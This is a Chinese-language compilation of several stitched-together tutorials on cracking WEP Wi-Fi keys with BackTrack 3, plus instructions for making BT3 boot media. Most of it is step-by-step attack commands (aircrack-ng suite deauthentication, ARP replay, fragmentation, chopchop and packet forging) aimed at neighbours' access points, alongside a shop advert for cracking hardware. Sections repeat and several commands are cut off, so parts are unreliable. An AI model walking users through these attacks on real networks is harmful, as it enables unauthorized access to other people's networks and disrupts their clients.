BT3 破解无线WEP/WPA 教程
声明:任何不经别人同意而进入别人网络都是非法和不道德的行为.
本教程用于学习和交流,如要实验请拿自已的AP 开刀!本教程非本人原 创,是采用了网上各位兄弟的大作编辑而成.如有版权问题请联系本人.
本人是各无线论坛ID:水草,淘宝ID:水草GG,此教程只是将部分内容简易化,易于新 手操作,如有不正确的地方请指出.欢迎各位到论坛提问咨询. 如果需要购买破解装备可以到我的淘宝店看看 https://www.doczj.com/doc/0017866970.html, 此教程主要是作为赠品送给各位淘宝买家的.
1-1.下载BT3 FINAL版,光盘版下载地址 刻盘或者做硬盘虚拟机启动,就不详细说明了.虚拟机要启用USB设备,对于新手开始不推荐使用.
BackTrack 3 Final 光盘版 Name:: bt3-final.iso Size: 695 MB Download: https://www.doczj.com/doc/0017866970.html,.uoc.gr/mirrors/linux/backtrack/bt3-final.iso MD5: f79cbfbcd25147df32f5f6dfa287c2d9 SHA1: 471f0e41931366517ea8bffe910fb09a815e42c7
1-2.启动有可能要求输入用户名和密码. 用户名:root 密码:toor ,进入图形界面:startx .
有的电脑启动BT3 后黑屏:xconf 再输入startx 有的电脑实在不能进入桌面窗口的时候你也可以直接在提示符下输入各破解命令,同时可用alt+f1 打开一个 shell,alt+f2 打开第二个shell,alt+f3 打开第三个等.关闭窗口用PRINT SCREEN 键.
ifconfig –a 记住自己网卡的MAC,不同的网卡不同的电脑接口可能不一样.WLG-1500SMA和760N一般为eth?,这里的?是数字. 下面图片里或者文章命令里的wifi0,rausb0,eth1等是各种网卡接口,要换成换成自己的.
1-3.查看网卡接口,输入:
三恩论坛 https://www.doczj.com/doc/0017866970.html,
1-4.加载网卡 输入命令: Ifconfig –a eth1
1-5.查找目标: 当然也可以在WINDOWS下用软件搜索要破解的AP,这样可以省略这步. 输入命令: airodump-ng eth1
通过扫描获得你要破解的AP 的MAC 和SSID 还有是否有客户端等信息.
三恩论坛 https://www.doczj.com/doc/0017866970.html,
看上图中CH是频道,PWR是信号,理论是越高越好.WUSB54G要求40以上,WG111 V2,760N,1500SMA8 以上.ESSID为网络名称,ENC是加密方式,AUTH,DATA为需要抓取的破解数据,一般要30000以上. BSSID为AP的MAC,STATION为客户端的MAC,如果要破的AP MAC在下面没有显示就是没有客户端
记录下这些信息后,请关闭此窗口.不然会后面无客户端建立虚拟连接时信道会出现一直在跳转的情况.
注:有时可以修改自己网卡的MAC 地址,一般不用,可以跳过.
命令中的wifi0改为自己的网卡接口
1-6.激活网卡的Monitor 模式并工作在需要破解的AP的频道
输入: airmon-ng start eth1 6 这里的数字6是需要破解的频道
三恩论坛 https://www.doczj.com/doc/0017866970.html,
注:不同的网卡有不同的加载方式
1-7. 输入截取数据包命令(截取6信道的ivs 数据包,并保存名为name.ivs)
输入命令: airodump-ng --ivs -w
(其中file name 是获取的ivs 的保存文件的名字, channel是频道,你根据实际修改)
以上步骤是通用的
在抓包到一定数量后可以输入破解命令,一般需要30000以上.如果包的数量够密码很快出来了
输入命令: aircrack-ng -n 64 -b
下面根据有无客户端等各种情况指定命令,以加快抓包速度,提 高破解效率,当然你如果有时间可以等待!
二. 有客户端WEP 破解
分a.b.c三种情况 a.有客户端,且合法客户端产生大量有效的数据,能直接获得大量IVS .直接用aircrack-ng 破
解
输入命令: aircrack-ng -n 64 -b
b.有客户端,合法客户端只能产生少量ivs 数据,就需要注入攻击加速产生大量ivs .
三恩论坛 https://www.doczj.com/doc/0017866970.html,
只要有少量的数据就可能获得arp 请求包,则可用arp 注入模式的-3 模式通过不断向AP 发送同 样的arp 请求包,来进行注入式攻击. 思路:用aireplay-ng 的arp 注入方式获得大量的ivs 输入命令: aireplay-ng -3 -b
注:这一步可能时间会长一点,因为需要等到ARP .
c.有客户端,但是客户端根本不在通信,不能产生ARP 包.-3 注入模式不成功, 输入命令: aireplay-ng -0 10 –a (AP MAC) –c (客户端 MAC) eth?
三恩论坛 https://www.doczj.com/doc/0017866970.html,
2-a-b-c.现在,只要一个命令就搞定,输入下面的命令,注意将wifi改为自己的网卡接口
三恩论坛 https://www.doczj.com/doc/0017866970.html,
Wesside-ng 这个命令其实就是一个-5 碎片注入,fragmentation 构造注入包,-3arp 注入,最后PTW 破解这 样一个思路.
B.无客户端开放式WEP 破解
b-0.
接1-7步
因为是无客户端,所以第一步就需要和AP 之间建立一个虚拟连接.这是非常关键的一步.为让AP 接受数据包, 必须使自己的网卡和AP 关联.如果没有关联的话,目标AP 将忽略所有从你网卡发送的数据包,IVS 数据将不 会产生.
输入命令: aireplay-ng -1 0 -e
三恩论坛 https://www.doczj.com/doc/0017866970.html,
注意这步一定要完成才可以继续下面的步骤.
如果回显虚拟伪装连接不成功,不能成功的原因很多,具体有如下几种:
1,目标AP 做了MAC 地址过滤 2,你离目标AP 物理距离太远 3,对方使用了WPA 加密 4,网卡,AP 可能不兼容,网卡没有使用和AP 一样的工作频道注:遇有不规则的essid 可用引号将essid 引起 来比如,'jack chen'.虚拟连接不成功可做如下尝试: 1 2 -e ssid省略掉 降低网卡的速率重新进行连接Iwconfig eth? Rate 2M
参数说明:rate 后面跟连接的速率,可以从小往大设置做尝试连接.后面的单位M 必须为大写
b-1.第一种破解方式:-2 交互攻
击模式,接步骤b-0 建立虚拟连接后直接用-2 交互攻击模式,这个模式集合了抓包和提取数据,发包注入三种能力.第八步:抓 包,提数据和发包攻击
b-1-1.输入: aireplay-ng -2 -p 0841 -c ffffffffffff -b
发包成功后可得到足够的ivs ,然后用aircrack-ng 破解.
三恩论坛 https://www.doczj.com/doc/0017866970.html,
成功后如上图截获了一个可以直接进行注入的数据包,并回显Use this packet. b-1-2.按 然后开始 发包攻击,date 飞快涨.当获得足够的ivs 以后就可破解了. b-2 第二种破解方式:接步骤b-0
第八步:利用-5 碎片攻击模式获得一个可用的包含密钥是数据文件(xor 文件)第九步:然后通过数据包制 造程序Packetforge-ng 提取xor 文件中的PRGA 伪造一个arp 包,第十步:最后利用交互式攻击模式-2 发包 攻击.
b-2-1.采用碎片包攻击模式-5,获得一个PRGA 数据包(xor 文件). 输入: aireplay-ng -5 –b (AP MAC) –h (my mac) eth?
三恩论坛 https://www.doczj.com/doc/0017866970.html,
如顺利,将得到一个可利用的数据包如上图,系统将回显Use this packet ? b-2-2.输入y 回车,将得到一个至关重要的xor 文件.这一步生成的xor 文件将被我们用来产生arp 数据包.
b-2-3.再输入ls 查看当前目录,你将看到刚才生成的一个后缀名为xor 的文件.
三恩论坛 https://www.doczj.com/doc/0017866970.html,
用数据包制造程序packetforge-ng 将上面获得的PRGA 数据包伪造成可利用的ARP 注入包.其工作原理就是使 目标AP 重新广播包,当AP 重广播时,一个新的IVS 将产生,我们就是利用这个来破解.
b-2-4.输入: packetforge-ng -0 –a (AP MAC) –h (my MAC) –k 255.255.255.255 –i 255.255.255.255 –y name-xor –w myarp 参数说明:-y (filename )是用来读取PRGA 的文件-w (filename)将arp 包写入文件,我用的文件名是myarp
系统回显:Wrote packet to: mrarp
采用交互模式-2,发包注入攻击. b-2-5.输入: aireplay-ng -2 –r myarp –x 256 eth?
【-r】:从指定文件中读取arp 数据包【-x】:定义每秒发送的数据包数量.为避免网卡死机,可选择256,
三恩论坛 https://www.doczj.com/doc/0017866970.html,
最高不超过1024
b-2-6.输入y,回车攻击开始
这时,前面的抓包窗口上的data 将迅速增加.
三恩论坛 https://www.doczj.com/doc/0017866970.html,
到数据增加到1.5 万以上时.
采用aircrack-ng 来进行破解 b-3.第三种破解方式, 接步骤b-0 第八步:利用-4 的Chopchop 攻击模式获得一个可用的包含密钥数据文件(xor 文件)第九步:通过数据包
制造程序Packetforge-ng 提取xor 文件中的PRGA 伪造一个arp 包第十步:最后利用交互式攻击模式-2 发包 攻击.第八步:采用-4 的Chopchop 攻击模式获得一个包含密钥数据的xor 文件 b-3-1.输入:aireplay-ng -4 –b (AP MAC) –h (自己的MAC) eth0 参数说明:-b:设置需要破解的AP 的mac -h:设置用于连接的无线网卡的mac(自己网卡),eth0改为自己的 网卡接口.
顺利将得到一个可利用的数据包,按 将利用此数据包生产一个xor 文件
三恩论坛 https://www.doczj.com/doc/0017866970.html,
如上图所示得到一个名为replay_dec-0523-075615 的xor 文件, b-3-2.通过数据包制造程序Packetforge-ng 提取上面xor 文件来伪造一个arp 包
如上图,成功生成一个名为myarp 的可用来注入的arp 数据包.
b-3-3.最后利用交互式攻击模式-2 发包攻击.rausb0为网卡接口
b-3-4.发现了可利用的myarp 的数据包,按y 后,立刻注入攻击.Date 疯涨注入成功将会获得足够的ivs 然
三恩论坛 https://www.doczj.com/doc/0017866970.html,
后直接用aircrack 进行破解
破解命令:
注: 在破解无客户端的时候经常会遇到有些AP, 尝试了各种注入攻击模式都无法成功注入, date
一直为0.这时候可以根据下面的四种提示做进一步的尝试. 1 2 3 移动无线网卡位置让其获得更好的信号强度; 虚拟连接; 交互模式攻击中加入-F 参数(自动选择获取的数据包进行注入攻击)如下图所示
然后你可以一边去做自己的事,等你忙好了回来的时候说不定date 已经涨到几十万了; 4.在使用各种注入命令等待获取注入数据包的时候,如果你另外有一台计算机可以让另外一台 计算机连接到你要破解的无线AP. 在连接过程中当提示输入密码的时候, 你随便输入一个什么密 码,会出现正在获取IP 地址.这时候你的注入攻击的页面就会获得一个可用的注入数据包,从 而实现注入攻击.
预共享WEP 破解
大家都知道WEP 加密有两种加密方式开放式和共享式.开放式系统验证和共享密钥验证两种模式中,每个移动 客户端都必须针对访问点进行验证.开放式系统验证其实可以称为"无验证",因为实际上没有进行验证—— 工作站说"请求验证",而AP 也不管是否密钥是否正确,先"答应了再说",但最终ap 会验证密钥是否正确, 决定是否允许接入——这种验证方式的ap,往往你随便输入一个密码,都可以连接,但如果密码不正确,会显 示为"受限制".共享密钥验证稍微强大一些,工作站请求验证,而访问点(AP)用WEP 加密的质询进行响应. 如果工作站的提供的密钥是错误的,则立即拒绝请求.如果工作站有正确的WEP 密码,就可以解密该质询,并 允许其接入.因此,连接共享密钥系统,如果密钥不正确,通常会立即显示"该网络不存在等提示".
前提:预共享WEP 破解必须要有合法无线客户端
预共享密钥的WEP 不能建立-1 虚拟连接,你在建立虚拟连接的时候会有如下提示,见图中红色提示.
三恩论坛 https://www.doczj.com/doc/0017866970.html,
由于预共享WEP 加密不能建立虚拟连接,因此预共享WEP 破解必须是有客户端,无客户端不能进行破解具体破 解方式和开放式WEP 破解的思路是一样的. 1 正常激活网卡的监听模式 2 信道的ivs 数据包,并保存名为name.ivs)
(--ivs:仅截取ivs 数据包,-w:写入文件,-c:截取ivs 的信道)(其中name 是获取的ivs 的保存文件的 名字,11 是channel 值,你根据实际修改)如下图所示STATION 下有一个合法的客户端,AUTH 下显示SKA 为 预共享WEP 加密方式
破解思路一:
3.用aireplay-ng 的arp 注入
注:-h 后面跟合法客户端的MAC 地址如下图所示成功注入
注: 这一步可能时间会长一点, 因为需要等到可注入的ARP . 注入成功将会获得足够的ivs 然后直接用aircrack 进行破解
破解思路二:
3.用-2 交互攻击模式注入
三恩论坛 https://www.doczj.com/doc/0017866970.html,
注:-h 后面跟合法客户端的MAC 地址如下图所示成功注入
注入成功将会获得足够的ivs 然后直接用aircrack 进行破解
破解思路三:
以上两步都是基于有客户端并且客户端能产生少量数据的情况,但是有时候AP 有客户端连接,但是并不在通信 不能产生少量可用于注入的数据包.这时候就可以利用-0 冲突模式重新连接所产生的握手数据让-3 的ARP 注 入方式或-2 交互注入方式获得有效的可用于注入的ARP 从而完成注入.如下图所示
三恩论坛 https://www.doczj.com/doc/0017866970.html,
当-0 冲突模式攻击成功后,-2 的交互模式立刻获得一个可用的注入包.如下图所示
三恩论坛 https://www.doczj.com/doc/0017866970.html,
BT3破解和制作U盘版BT3教程 休闲 2009-06-25 12:15 阅读15012 评论8 字号:大中小 一分钟制作BT3 U盘版 方便,快捷简单 光盘版BT3, 大概694MB,直接刻盘,然后用光盘引导,即可进入bt3,连接为: http://ftp.heanet.ie/mirrors/backtrack/bt3-final.iso U盘版Bt3,大概783MB,连接为: http://cesium.di.uminho.pt/pub/backtrack/bt3final_usb.iso 准备工作:一张1G以上的U盘,或是SD卡,或是TF卡,当然,TF或SD卡的话,你要有读卡器才能 在电脑上读出来, 建议将U盘格式化成FAT32,这样比较节省空间,至于为什么节省空间,FAT32与FAT格式的比较请您自己百度去,这里不多说了 格式化完成后,此U盘为空的U盘 插入到电脑USB口 1.下载U盘版bt3的文件 地址为:http://cesium.di.uminho.pt/pub/backtrack/bt3final_usb.iso 文件大概为783MB 2.将此ISO文件加载到虚拟光驱中,在虚拟光驱中,得到如下文件:
Snap1.jpg 当然,你也可以用winrar解压到目录中,估计应该没啥问题,因为空间问题,我就不想解压了我是直接加栽到虚拟光驱来用的,省空间,无需解压 3.将虚拟光驱中的文件也就是BT3,BOOT这两件文件夹copy到U盘中去 Snap2.jpg 4.点击开始-运行,输入CMD, 然后回车,进入命令行模式
Snap4.jpg 输入U盘的盘符,我的为I:,然后回车 输入cd boot 回车 输入bootinst.bat 回车,就会开始制作BT3
backtrack3(BT3) usb版破解WEP无线网络密码详细步骤(附软件及中文包下载地址) 一、先开始制作启动U盘: 将下载好的backtrack3(BT3) usb版(下载地址在文章末尾)文件bt3b141207.rar直接解压到U盘(1G以上容量)。把Boot 和BT3两个文件夹放到U盘的根目录,打开BOOT文件夹双击运行" bootinst.bat "批处理文件。U盘里就会多出4个文件." isolinux.boot" "isolinux.cfg" "isolinux.bin " "syslinux.cfg" (如果想要中文截面的BT3的菜单,就在下载BT3中文语言包。下载地址:https://www.doczj.com/doc/0017866970.html,/cn/docs/listallfiles.do提取密码:4871454552251231。(用的是免费的网络硬盘,广告较多,有些朋友可能没认真看没找到,我说下大概位置,输入提取码后,拉到中间找下面的几个字(红色的) 以下这三个链接后两个均可下载 推荐快车(flashget)高速下载文件下载文件(IE浏览器) 下载文件(非IE浏览器) )把压缩包里的"中文包"解压出来,将里面的*.lzm文件拷贝到u盘的BT3\modules目录,即可实现bt3中文化。) 二、之后重启windows 进入BIOS设置,把BIOS里的frist boot device设置为USB-HDD (或者是USB--ZIP)再重启选择从usb启动。系统进入backtrack3 系统。 三、现在开始破解 1.在shell窗口中输入ifconfig 命令,出现如下信息: lo no wireless extensions. eth0 no wireless extensions. eth1 IEEE 802.11g ESSID:"" Nickname:"" Mode:(......)Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82 Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3 Retry:off RTS thr:off Fragment thr:off Encryption key:off Power Management:off Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 2.找出你的无线网卡名字,我这里是eth1.再启动你的网卡为Moniter模式(输入airmon-ng start eth1 11)。再输入ifconfig 命令,返回如下信息: lo no wireless extensions. eth0 no wireless extensions. eth1 IEEE 802.11g ESSID:"" Nickname:"" Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82 Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3 Retry:off RTS thr:off Fragment thr:off Encryption key:off Power Management:off Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
虚拟机破解wep最简单教程 1准备工作:下载虚拟机https://www.doczj.com/doc/0017866970.html,/soft/8765.html 下载BT3 CD映像https://www.doczj.com/doc/0017866970.html,/Soft/2008/660.html 2 安装虚拟机,见下图 点新建虚拟机 典型安装 选择LINUX,注意版本选择 other linux 2.6.x kernel!
按下一步是提示虚拟主机名字和要安装的位置(自定) 选择使用网络地址翻译 下一步完成
点击绿色按钮启动 3 完成以上的步骤后就开始破解啦 启动BT3后,会出现一个界面。会有很多的选择。我们选择默认的第一个。 到最后,大约等待1分钟,看您电脑配置。 如果不能默认进入系统提示输入账户密码, 在此我们输入如下:进BT3后怎么老出现, “bt login”(2009-11-11 12:38:22) 标签:杂谈 这是需要用户名和密码 用户名:root 密码:toor 再输入:startx 是在不行输入xconf,再输入startx root 回车 toor 回车 xconf 回车 startx 回车 当然如果是默认进入系统就更好了。如果不是默认就要输入上边的命令,如果正常进入上边的步骤可以跳过! 注意一定要做!启动建好的虚拟机,加载网卡,“虚拟机-可移动设备-USB 设备-Realtak可移动设备”如下图(如果破解时无法抓包那一定是漏了这步)注意一定要做,启动BT3时就要做了
接着就是正式破解了,打开一个shell输入命令 打开shell,输入命令 spoonwep(纯字母无数字)
回车后会自动出现一个新窗口如下图
使用BT3破解WEP密码教程,目的是让大家可以了解无线网络破解的方式,从而加强自己的网络安全性。请不要用于非法目的。 这里是一个详细的BT3 Backtrack 3 破解无线网WEP的一个教程。 首先 到这个地方确认你的电脑无线网卡可以抓包,目前市上最好的设备就是无线卡王了,功率超强。 然后开始下载你需要的BT3版本: 如果随便玩玩,或者是台式机,可以下载CD版的那个,因为启动一次时间不短。如果是笔记本,硬盘又大,可以下载USB版的那个。 下载完以后,可以装到一个可以启动的U盘里面,或者直接保存到硬盘上,下面介绍如何用硬盘直接启动BT3 Backtrack 3 。 如何制作BT3启动盘 光盘版的,刻录完就好了,不提了。 USB版的,随便解压缩到某个U盘的根目录,这样,根目录下有BT3和Boot 两个文件夹。 打开一个DOS窗口,指向你的U盘目录,比如是H盘,那么 ———运行——— H: +回车 cd boot bootinst.bat 按提示,确认你的确是在你的U盘的目录下操作。然后OK了。 重启时插入U盘即可启动,如果有任何问题,请确认你的电脑打开了U盘启动,并且被放在第一启动项(ThinkPad可以指定排除某个启动项的,请检查) 或者在启动时按住F12,选择U盘启动。 如果是硬盘启动,虽然有很多办法,但是为了VISTA和XP的兼容,个人推荐DOS 启动法,即先弄一个DOS的启动,比如弄一个MouseDOS一类的,傻瓜安装,可以让电脑启动进入纯DOS状态,然后在DOS情况下,进入硬盘上解压出的那个Boot目录里面,里面有个DOS 目录,然后执行BT3.bat 即可。 建议在执行BT3.bat前,先运行一下Smartdrv.exe ,可以加快启动速度很多。(附件里有Smartdrv.exe 98版) 小提示:DOS下的启动,不会自动进入图形界面,可以通过编辑DOS目录里面的CONFIG文件来实现: 只需要在CONFIG里面,最后加上一句: autoexec=xconf;kdm 就可以了。 我顺便修改了MouseDOS的Autoexec.bat文件,直接加上: smartdrv.exe D: cd boot
最详细BT BT33U盘版的制作与破解图文教程 根据需要准备相应的BT文件: 光盘版BT3,大概694MB,直接刻盘,然后用光盘引导,即可进入bt3,连接为: http://ftp.heanet.ie/mirrors/backtrack/bt3-final.iso U盘版Bt3,大概783MB,连接为: http://cesium.di.uminho.pt/pub/backtrack/bt3final_usb.iso 准备工作:一张1G以上的U盘,或是SD卡,或是TF卡,当然,TF或SD卡的话,你要有读卡器才能在电脑上读出来,将U盘格式化成FAT32格式,格式化完成后,此U盘为空的U盘插入到电脑USB口 一.制作U盘启动: 1.下载U盘版bt3的文件,地址为:http://cesium.di.uminho.pt/pub/backtrack/bt3final_usb.iso 文件大概为783MB 2.将此ISO文件加载到虚拟光驱中,或者用winrar,7Z待压缩软件解压,得到BT3,BOOT 这两件文件夹。 3.将BT3,BOOT这两件文件夹copy到U盘根目录。如果u盘里的文件"BT3"文件夹为英文小写"bt3",请将其改完大写"BT3",否则不能正常启动。 4.进入U盘,打开boot文件夹如下:
5.双击运行文件,会出现如下命令提示符窗口: 大概意思就是,此操作将会重写U盘的MBR(即引导区),如果此分区是您的一个硬盘上的分区,那您的Windows系统将会启动不了,请小心,按X键中止操作,按其他任意键继续制作,因是在U盘上操作的,所以不用理会,按任意键就可以了。 6.按任意键后,出现如下画面: 这是制作完成后的提示,意思是说设置引导记录成功,按任意键退出制作,制作的过程很快,大概不到十秒,只是重新写了一下U盘的引导区就OK了 7.检查U盘BT3/modules文件夹中有无包含spoonwep2.lzm和spoonwpa.lzm这两个文件,(此二个文件是破解无线网络的关键所在,约为3.1M)若有,请看下一步,若无,请先下载,网上可供下载的多为网盘,论坛,(此链接仅作参考https://www.doczj.com/doc/0017866970.html,/soft/13649.html 请自行搜索)下载后将文件解压到U盘:\BT3\modules下。光盘版放到相同的文件目录用编译光盘工具UltraISO重新编译光盘。 8.因BT3对中文支持不是很好,有些地方不能正常显示中文,所以有需要正常显示中文的朋友,可再加入中文包即可解决。不需要的可以略过,不影响破解。下载后将文件解压到U 盘:\BT3\modules下,(此链接仅作参考https://www.doczj.com/doc/0017866970.html,/f/6412159.html请自行搜索)。
详细图文教大家怎么使用Vmware(虚拟机)和BT3破解加密无线网络 2010-12-20 13:03 本教程只作学习和交流使用,任何其它商用与本人无关, 在开始教程之前, 首先需要用到几个软件,感兴趣的朋友看完贴子后可以去百度搜一下下载地址, 虚拟机: VMware Workstation 6.5 正式版.exe BT3系统: bt3 final.iso 虚拟机的作用就上让你在XP里面直接可以再运行一个操作系统,说简单点就是让两个操作系统同进可以运行, BT3全称BackTrack 3, 是基于Slackware和SLAX的自启动运行光盘,它包含了一套安全及计算机取证工具,里面包含了破解无线网络密码的工具,像WEP,WPA,下面教程中我们就需要用到. 下载完这两个软件完以后,我们还需用到一个USB的大功率无线网卡,也就是目前所说的蹭网卡,感兴趣的朋友可以百度一下, 台湾Wifly-ctiy 11N 1000MW超级无线网卡,这个是目前在市场上面比较好的一款,比我的笔记本多搜出16个无线网络,搜索信号能力很强悍,这个教程也是用这个来作图文演式,在准备软件和硬件设备之后,我们就开始手把手的教大家怎么获得无线网络加密的密码. 首先需要把台湾Wifly-ctiy 11N 1000MW超级无线网卡接上电脑之后,装好天线和驱动软件,我们打开管理界面,就可以看到自动搜索出很多你周围的无线网络,在这里我们以破解WEP密码为例作教程说明,单击一个连接,这个网络是否是使用WEP加密,并且记住这个网络的名称,下面我们就会要用到.
第二步就是下载完vmware 6.5 虚拟机并且安装好,虚拟机里运行 BT3 可以避免,硬件兼容性问题启动不了的情况。(虚拟机内存设置可以等于不要小于 256 兆,如果你的内存是2G,设为512最佳,虚拟机比较耗内存!),在安装好vmware 6.5 之后,我们现在就需要新建一个虚拟机.
手把手教你如何破解无线路由密码 作者:点击数:582721 更新时间:10-06-07 下面开始我们的WEP解密之旅: 一准备篇 1、一个有可破解无线信号的环境。如我在家随便搜索出来的信号。 2、带无线网卡的电脑一台(笔记本台式机均可,只要无线网卡兼容BT3),我用的是三星NC10的上网本。 3、2G以上优盘一个(我用的是kingston 8G 的) 4、下载BT3,约800多兆。 下载地址 : http://119.147.41.16/down?cid=DE7F67E4193B2A1A692C319B6B9755827D88F03C&t=2&fmt=
&usrinput=bt3&dt= 2018000&ps=0_0&rt=0kbs&plt=0, 用迅雷下载 注:BT3 全称BackTrack3,与我们常说的bt下载是完全不同的概念。以我理解就是集成了一些计算机 安全软件的linux系统。正是由于它的出世和不断普及,使得破解可让普通用户轻易言之。 5、下载spoonwep2中文包。地址: http://119.147.41.16/down?cid=939A75C3CA148C7CDC90A23A7F59EF37B95A1FCC&t=2&fmt= &usrinput= spoonwep2&dt=2002000&ps=0_0&rt=0kbs&plt=0 注:spoonwep2就是我们的破解软件,一个非常强悍的图形化破解WEP无线网络密码的工具。 二、安装篇 1、将优盘格式化,配置如下图,唯一要注意文件系统选为FAT32就可以了。 2、将刚才下载完成的bt3解压缩,复制到优盘,完成后会看到优盘目录下有两个文件夹,
BT3破解和制作U盘版BT3教程 一分钟制作 BT3 U盘版 方便,快捷简单 光盘版BT3, 大概694MB,直接刻盘,然后用光盘引导,即可进入bt3,连接为: http://ftp.heanet.ie/mirrors/backtrack/bt3-final.iso U盘版Bt3,大概783MB,连接为: http://cesium.di.uminho.pt/pub/backtrack/bt3final_usb.iso 准备工作:一张1G以上的U盘,或是SD卡,或是TF卡,当然,TF或SD卡的话,你要有读卡器才能 在电脑上读出来, 建议将U盘格式化成FAT32,这样比较节省空间,至于为什么节省空间,FAT32与FAT格式的比较 请您自己百度去,这里不多说了 格式化完成后,此U盘为空的U盘 插入到电脑USB口 1.下载U盘版bt3的文件 地址为:http://cesium.di.uminho.pt/pub/backtrack/bt3final_usb.iso 文件大概为 783MB 2.将此ISO文件加载到虚拟光驱中,在虚拟光驱中,得到如下文件: Snap1.jpg 当然,你也可以用winrar解压到目录中,估计应该没啥问题,因为空间问题,我就不想解压了 我是直接加栽到虚拟光驱来用的,省空间,无需解压 3.将虚拟光驱中的文件也就是BT3,BOOT这两件文件夹copy到U盘中去
Snap2.jpg 4.点击开始-运行,输入CMD, 然后回车,进入命令行模式 Snap4.jpg 输入U盘的盘符,我的为I:,然后回车 输入 cd boot 回车 输入 bootinst.bat 回车,就会开始制作BT3